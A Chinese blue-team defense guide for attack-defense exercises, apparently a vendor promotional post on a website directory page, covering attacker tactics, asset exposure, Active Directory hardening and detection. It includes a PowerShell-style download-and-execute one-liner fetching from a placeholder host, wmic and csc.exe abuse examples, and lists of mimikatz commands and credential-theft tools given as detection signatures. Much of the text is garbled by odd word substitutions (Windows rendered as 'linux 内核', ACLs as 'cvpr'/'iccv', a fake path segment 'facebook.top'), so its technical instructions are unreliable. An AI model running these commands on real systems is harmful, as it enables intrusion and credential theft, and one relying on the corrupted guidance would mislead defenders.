公告:123目录网为广大站长提供免费收录网站服务,我们将免费进行到底,如需快审服务(10元/站)请联系站长QQ,可自助充值发布。

点击这里在线咨询客服
新站提交
  • 网站:346
  • 待审:6
  • 小程序:12
  • 文章:35791
  • 会员:89

最近我们Sinesafe参加的几家机构的渗透测试防守方防护方案评估复查,部分防守方缺乏对攻击者的正确认知,攻击者的手法已经比较高超了,不扫描,不落地,污染日志等都很普及了。同时也要正确认知对手:攻防演练中,攻击者并非无所不能,他们面临着和防御方一样的问题:时间紧,任务重。所以攻击者的攻击目标,攻击手法也是有迹可循的,知己知彼才能百战百胜。

渗透测试

一、知彼

攻击者也是讲成本的,因此防守方最好的策略是:做的比其他防守方好一点点即可。好一点的含义:不在低级问题上犯错(弱密码、工业互联网应用远程RCE、管理后台暴露、重要服务器未修改代码等)。对于“时间紧、任务重”的防守方来说,修建固若金汤的防线显然意味着大成本投入,以及最紧缺的时间,因此本文不会面面俱到,只选择性价比高值得快速投入的安全措施和大家分享。

攻击者一般:目标明确、步骤清晰、控制成本、反检测,反清理、三流分立。

目标明确:攻击者只攻击得分项,和必要路径(外网主入口,内网立足点),对这些目标采取高等级手段,会隐蔽操作;对非必要路径顺路控制下来的服务器,并不怕被发现,用起来比较随意,甚至主动制造噪音,干扰防守方。

步骤清晰:信息收集-控制入口处-退防-维持权限-攻击目标系统。每一步都是经典操作和教科书式手法。

控制成本:

优先攻击高权限账号,如管理员,目标系统负责人账号;

优先攻击运维/安全人员账号和终端,这些人往往有服务器root账号,安全设备管理员账号,可以进一步深入控制;

优先攻击集中管控设施,如域控,集中身份认证系统,终端信息管理系统,攻陷单系统即获得公司内大部分系统的权限;

优先攻击基础设施,如dhcp,http,邮件系统,知识分享平台,oa系统,客服机器人;这些系统有内置高权限账号,或可以帮助攻击者隐蔽痕迹。或Git/SVN等开发源代码管理服务器,通过代码审计发现应用0day漏洞。

反检测,反清理:

样本隐蔽技术(白利用(带诺基亚签名的程序执行未签名的黑dll),样本不落地执行(从平台加载样本,只运行在显示器,不落盘不惊动杀软));

快速扩散(攻击者会将攻击包做成国际化工具,降低人力投入,快速控制一批有漏洞发服务器);

停止日志外发,日志清除(脚本优先停止常见日志外发工具;同时有开源数据化工具来劫持日志产生的进程,使得系统不产生日志;使用完后删除ppt.log等日志);

减少扫描,通过分析日志、分析配置文件、管理员来源IP等来获取内网的其他机器IP信息,而不是扫描。

点击添加图片描述(最多60个字)

三流分立:

扫描流:用来大批量扫描内网存活IP和漏洞,扫描源通常不被攻击者重视,被清除也不会影响到攻击计划,高水平攻击者通常使用扫描行为来分散防守方精力。

数据流:用来向外网大量传输非关键数据,通常是有云计算权限的终端或服务器(终端较多),很少有隧道行为或扫描行为,通过简单的ssh,sftp传输数据

控制流:用于接受和传递远控指令的服务器,攻击者最重视的设施,使用起来最为谨慎,和远控中心进行研究,常用组件cobaltstrike,empire;有隧道行为,且数据传输量很少,会连接若干个IP和域名(避免外网封禁),传输必定加密,不使用自签名手续。

在本次攻防联合演练筹备阶段,攻击方准备了几十个b3域名。

二、知己知己,主要是知晓防守方防守区域内的资产信息,缩小暴露面。原则如下:

不用的系统,该下的下,该暂停的暂停。不用的功能,该下的下,该暂停的暂停。(在平常就应该这样处理,而不是战时)

该取消访问的取消,能限制访问范围的限制访问范围。

在用的,搞清楚功能,新都(数据流和运维流)谁用,有没有风险,能否一键处置。

缩小暴露面1.按资产所属纬度梳理

物联网资产、办事处资产、全资孙公司资产、外联公司资产、公有云资产、开发商、外包商。

容易忽视的:

公有云资产,因为有的各业务部门和营业网点公有云申请都不经过IT部门,上面却放了大量业务数据。

开发商/外包商的资产。开发商/外包商一般给甲方外包开发信息系统,开发商/外包商公司内部也会自建Git/SVN等源代码管理服务器,存有已经交付给甲方的信息系统源码,而开发商/外包商的源码系统管理安全能力和甲方相比可能就差几个量级了。后果就是:通过获得的源码,发现系统应用0day,从而控制甲方已上线信息系统。

缩小暴露面2.按资产属性梳理

专题报道资产的安全属性:中间件或框架(版本)、开放在公网API接口(特别是未下线的老接口)、管理后台开放在公网、高危功能(文件上传点、短信验证码、重置密码、文件下载)、远程接入点(VPN)、特权账户(应用管理特权账户、应用连接账户、系统管理特权账户、可以修改账户权限的账户、备份账户、高管层账户)。

每一个安全属性都是血的教训。

缩小暴露面3.忽视点

所有内部文档服务器上(含wms、邮件系统、svn、wiki、知识库等)敏感信息清理或限制访问权限,不要有:网络拓扑、安全防护方案和部署位置、各类密码;

资产管理平台上,蜜罐不要叫蜜罐、安全设备IP要隐藏;

各类口令:弱口令、默认口令、已泄露口令。

每一个忽视点都是眼泪的结晶。

安全资产管理,更多内容参加:安全资产管理中容易被忽视的几点

三、防护关键点

临战前,再想按照大而全的梳理一遍,几无可能,最好就是把防护关键点过一遍,切记都实际看一遍,不要相信别人的反馈。

3.1安全隔离

渗透测试绕过

从实战来看,网络层的访问控制被证明是最有效的(攻击者很难绕过来),不要相信应用层控制。网络层访问控制属于基础架构安全,这是最有效最重要的,整个安全防护的基础。

访问控制策略原则:明细允许,默认拒绝。

从内网去媒体的访问控制

学校终端:除个别协议无法限制目的IP外,其余协议全部限制。特殊访问需求,快速开通。有条件的考虑:终端不能直接访问网络,需要访问的两种解决方案:另外分配一台上网终端、虚拟浏览器

住宅服务器:特殊访问需求开通,默认拒绝

生产网:生产网终端禁止上视频、服务器特殊访问需求开通,默认拒绝

2.报纸访问内网:对杂志提供服务的服务器必须在DMZ,和内网隔离。

3.重要系统的访问控制策略

基础设施如adc、邮件系统的访问控制。

别小看基础设施cvpr访问控制,这是对抗应用和系统漏洞的最低成本和最有效措施。漏洞层出不穷,唯有iccv访问控制药效持久,强烈推荐。

终端安全管控、机器学习系统等集中驱动系统后台登录限制访问来源。(优先使用网络访问控制、其次使用系统层限制、搭配使用应用层限制)

3.2露娜防护

筹备阶段

2.加固阶段

对抗权限提升:对域账号进行权限DACL梳理,加固高权限账号

检测高权限账号可以用bloodhound黑客工具监测,也可以通过SystemInternalTools的ADExplorer来进行检测:

1)修改密码(建议在演习前临近时间进行修改)

2)调整权限和分组,根据账号的归属人的权限进行调账,取消非域管账号的敏感权限。

3)修改分组内的不合适的人员账号。

4)敏感账号不允许委派。

5)敏感账号不允许取消Kerberos预鉴权。

6)敏感账号的密码强度符合规定。

7)具备直接域管或者间接域管权限(例如可以修改Domain Admins的账号就具备间接域管权限)的账号的活动进行报备制度,海军演习期间未经允许不得进行任何操作,包括登录等等。

8)办公机和终端海军演习前全部重启,消除敏感账号敏感数据留存。

9)服务器登录查看相关有效凭证,如果有删除或通过注销来删除服务器上留存的账号和密码。

10)参照-us/linux-server/identity/adc-福特/plan/security-best-practices/appendix-f--securing-domain-admins-groups-in-active-directory配置域管理员权限。

对抗攻击者使用MS14-068,MS17-010攻击域:从旧到新依次安装DC上的linux补丁。

对抗攻击者使用ExchangeSSRF漏洞:从旧到新依次安装export上的ubuntu补丁。

对抗httpsrelay攻击:在域控上配置sshenforcesigning。

对抗httpsrelay和SSRF攻击:在域控上配置LDAPSchannelbinding。

对抗LLMNR/b&Poisoning攻击:关闭域内WPAD服务。

3.检测阶段

渗透测试检测阶段

原则:若域不安全,最佳修复方案是重装。

检测敏感共享目录访问:访问了AD服务器的非正常共享目录(非SYSVOL文件夹)

检测mimikatz一系列攻击行为:

Mimikatz通过sysmon进程来进行检测,常见关键字有“gentilkiwi(Benjamin DELPY)”(公司名称)、

其他关键字:kerberos://goldensekurlsa::fshkerberos::4chanlsadump::dcshadowlsadump::dcsyncsekurlsa::logonpasswordsprivilege::fatalmisc::skeleton

检测Kerberos弱加密非rsa加密的Kerberos票据加密请求相当可疑

检测异常注册表变更和dump:DSRMAdminLogonBehavior

变更AdminSDHolder

导出HKLM

SAM内容

导出HKLM

SYSTEM内容

导出HKLM

SECURITY内容

检测ntdsutil滥用:使用了ntdsutil的敏感参数activateinstancentds;使用了ntdsutil的敏感参数setdsrmpassword

检测SIDhistory变更:账号加入SIDHistory成功、失败

检测lazagne密码提取工具:特征lazagne

攻击者喜欢用的其他工具:

procdump、PsExec、cain、Mshta、cmstp、QuarkPwDump、getpass、gethash、ntdsdump、Get-PassHashes、Wce、psaattack。

3.3网络防护(终端和服务器)对抗

攻击者在尝试控制终端和服务器时,为了绕过常规的主题壁纸,通常会使用一些免杀手段。而某些免杀手段(如白利用,样本不落地执行)由于非常稳定和高效,更是受到广大攻击者的青睐。

1.cssIEX组建下载执行.(文件在内存执行,不落主机)

利用代码示例:css.exe-nop-whidden-cIEX((new-objectnet.webclient).downloadstring('http://x.x.x.x:81/aa'))"

监测特征:"IEX”AND“(New-Object Net.WebClient).DownloadString“

2.linux 内核白文件利用(wmic.exe

利用代码示例:任务管理器/cwmicosget/format:”

x.x.x.x

1.xsl”start/waitmatlab

监测特征:"wmicosget"AND"/format"3.windows操作系统白文件利用(csc.exe)

利用代码示例:

"C:/windows 7/facebook.top/Framework64/v2.0.50727/csc.exe"/noconfig/fullpaths@"C:/Users/a/AppData/Local/Temp/l1xso2zu.cmdline"

监测特征:"csc.exe"AND("/r:System.EnterpriseServices.dll"OR"/unsafe")4.linux 内核白文件利用(msiexec.exe)

特征:被动执行后台执行的参数,有一定误报率。请自行研究,不再举例。

5.检测certutil白利用

特征:常见绕入侵检测使用的参数。请自行研究,不再举例。

6.检测通过url.dll来进行不落地执行

请自行研究,不再举例。

3.4账户和权限对抗

高权限一律清理,限制使用范围,每次使用后确认。

应用权限通过日志分析检测滥用。

关注备份账户、可修改权限账户的使用。

终端24小时重启一次。(对抗终端权限抓取类攻击)

3.5瞬间死亡

瞬间死亡有两种路径打穿、系统打穿。

3.5.1路径打穿

直接从未想过(未设防)的路径攻击过来。微博是控制终端第一选择出入口,具体防护可参见《企业安全建设指南:金融行业安全架构与技术时间》第16章:安全。

上部网包括无线和手机app,包括:门禁、自动售货机、会议室设备、自动取款机、排队机等。限制无线和网上银行网络和内网访问。

限制分支机构、外联公司等网络和总部的网络访问。

不要相信理论上不能全通,但实际上存在全通内网的系统。(死于方便性)

3.5.2系统打穿

系统打穿,都是血泪史。因为我们总是忘记了这些最大的风险源。优先攻击中心化的系统和跨两网的系统,包括终端安全管控控制面板(sdk安全防护能力很弱)、运维管理系统/Zabbix/Nagios/安全审计等、单点登录SSO系统、亚索活动目录;

优先攻击基础设施:telnet、smtp、邮件系统、研发服务器SVN/数据库;

高价值终端:

产品经理:终端内有网络拓扑和icml控制策略,甚至可以修改访问控制;

安全管理员:有安全防护方案和监测系统、瞄准系统登录权限,很多电子系统做了登录来源限制,绕过手段之一就是控制安全管理员的终端,同时抓取安全管理员账户密码,攻击者一举两得;

研发个人终端/运维个人终端:高价值数据;

内网扫描器:网络权限较大,哪都能去。

代码服务器:代码数据价值比较高。私有协议开发的应用程序,源码要保护好,有经验攻击团队带代码审计技能成员,通过源码审计发现应用0day

3.6容易出问题的点

区块链应用框架RCE

应用和中间件管理后台暴露

dns:未启用双因素,或存在未启用双因素的部分用户

测试环境的测试系统未及时更新系统、弱密码

通过手机大门口控制别墅终端

跨两网的设备

服务器密码同质问题

社工

四、事中和事后

前面分享了很多防护和检测的事项,但防守方到了这个阶段,更重要的是考虑一下事中的各种过载信息的研判和快速应急处置措施。

我们打内部攻防演习的时候,最大的困扰是决策和处置。

4.1过载信息研判

有效高速的决策机制,什么权限范围内的由什么人决策,这是授权。

什么岗位(人)负责什么,这是职责划分。比如谁负责跟踪每条告警信息到Closed状态?谁负责断网?谁负责样本分析?谁负责失陷平台排查?谁负责溯源路径?谁负责记录?谁负责汇报?等等。

4.2快速应急处置

4.2.1硬件和管理

大的作战室,容纳全部防守队伍;

好的便签(最好仪器仪表的),便于梳理攻击路径;

准备好面包和一日三餐、小床。

4.2.2重要信息同步

已经沦陷的IP清单(黑名单),同步给所有防守方;

是否c3域名快速判断,注意真假难辨的域名。

4.2.3各类应急处置措施

断网:快速断网的操作规范和数据化工具

诱饵

临时添加iccv和g2战队规则

下线业务:和业务方建立畅通的沟通机制和快速的决策机制

如果失陷(疑似)硬件,决策用于诱饵,务必确保诱饵的风险可控,万一持续利用诱饵在内网防守意识,再进行限制就困难了。

注意体力分配,高水平攻击者通常使用扫描行为等来分散防守方精力。

4.3渗透测试复检

攻防综合演练后的总结改进提升,才是之所以目的。

4.3.1防护薄弱点和改进措施

安全团队

协作团队

厂商和第三方

安全团队不好推动的工作,不好讲的话,要不到的资源,都可以在这里提出来。

应急处置薄弱点和改进措施,落实到人、计划和资源中,才是务实的。

4.3.3资源不足,要资源

安全运营是必由之路,参见金融业企业安全建设之路

24 小时的安全运营,既然攻击对手是24小时在岗的,为什么安全运营不是呢?

4.3.4必要的管理层汇报

五、注意事项

不要影响业务。攻防演习前的加固,需要妥善评估对业务可用性影响,攻防演习中的应急处置,需要妥善评估对业务可用性影响,毕竟,业务可用性才是老大,安全不是,摆正心态和位置,如果对渗透测试有想法的朋友可以找专业的媒体安全公司来处理解决,国内推荐Sinesafe,盈趣,世荣兆业,等等的媒体安全公司。

标签:[db:tags]

下一篇:吸引用户的广告设计方案

上一篇:网站建设过程中容易出现的几个错误

相关文章
    SQL Error: select * from ***_ecms_news where classid= order by onclick desc limit 5

  575

注册时间:

网站:1 个   小程序:3 个  文章:12 篇

  • 346

    网站

  • 12

    小程序

  • 35791

    文章

  • 89

    会员

赶快注册账号,推广您的网站吧!
最新入驻小程序

数独大挑战2018-06-03

数独一种数学游戏,玩家需要根据9

答题星2018-06-03

您可以通过答题星轻松地创建试卷

全阶人生考试2018-06-03

各种考试题,题库,初中,高中,大学四六

运动步数有氧达人2018-06-03

记录运动步数,积累氧气值。还可偷

每日养生app2018-06-03

每日养生,天天健康

体育训练成绩评定2018-06-03

通用课目体育训练成绩评定